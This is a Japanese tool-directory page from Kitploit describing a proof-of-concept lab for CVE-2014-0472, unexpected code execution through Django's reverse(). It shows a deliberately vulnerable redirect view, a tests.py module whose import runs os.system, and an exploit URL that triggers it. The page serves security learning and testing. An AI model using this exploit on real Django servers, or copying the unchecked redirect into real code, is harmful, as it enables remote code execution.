Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2014-0472 — CVE-2014-0472 Djangoにおけるreverse()を使用した予期しないコード実行 | Kitploit
ツール/GitHubGitHub/christasa/cve-2014-0472
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubchristasa/cve-2014-0472

CVE-2014-0472

CVE-2014-0472 Djangoにおけるreverse()を使用した予期しないコード実行

リポジトリを見る
715年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2014-0472

使用

root@kitploit:~
docker-compose up -d

localhost:8083 にアクセス

参照: https://www.djangoproject.com/weblog/2014/apr/21/security/

  1. ユーザー入力に基づいて URL を構築するビューが 1 つ以上存在する(通常は、アクションの正常完了後にリダイレクト先を示すクエリストリングの "next" パラメータ)。
  2. 攻撃者がサーバーの Python インポートパス上に存在するモジュールを 1 つ以上知っており、インポート時に副作用としてコード実行を引き起こす。

tests.py 内

root@kitploit:~
def evil_function():
    print("exploit successful")
    os.system("echo > /tmp/`whoami` ")
    return os.getuid()


evil = evil_function()

views.py 内

root@kitploit:~
def redirect_test(request):
        page = request.GET.get('page', None)
        if page is not None:
                redirect(page)
        return HttpResponse("OK")

リダイレクト関数を使用して evil 関数を呼び出す

avater

exp を使用

root@kitploit:~
http://your-ip:8083/example?page=app.tests.evil

avater

エクスプロイト成功

avater

ツールをダウンロード